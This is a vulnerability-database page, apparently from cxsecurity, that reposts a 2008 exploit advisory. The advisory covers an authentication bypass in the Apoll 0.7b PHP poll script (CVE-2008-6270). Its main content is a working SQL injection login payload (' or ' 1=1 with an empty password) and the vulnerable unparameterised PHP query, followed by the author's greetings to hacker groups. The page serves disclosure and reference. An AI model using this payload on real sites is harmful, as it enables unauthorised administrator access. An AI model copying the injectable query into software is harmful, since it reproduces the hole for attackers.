Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability
2009.02.27
Credit:
ZoRLu
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-6270
|
CVE-2008-6272
CWE:
CWE-89
[~] Apoll version Remote Auth Bypass Vulnerability [~] [~] version: beta 0.7 [~] [~] script dwonload: http://www.miticdjd.com/download/3/ [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 03.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] N0T: a.q kpss yuzden nete ara verebilirim : ( [~] [~] ----------------------------------------------------------- admin login: http://localhost/apoll/admin/index.php Exploit: username: [real_admin_or_user_name] ' or ' 1=1 password: dont write anything note: generally admin name: admin example for my localhost: admin: zorlu user: salla username: zorlu ' or ' 1=1 password: empty or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) ) username: salla ' or ' 1=1 password: empty file: apoll/admin/index.php code: $user = $_SESSION['user']; $pass = $_SESSION['pass']; $mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'"); $num = @mysql_num_rows($mysql); [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------
Referencje:
http://xforce.iss.net/xforce/xfdb/46286
http://www.securityfocus.com/bid/32079
http://www.milw0rm.com/exploits/6969
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top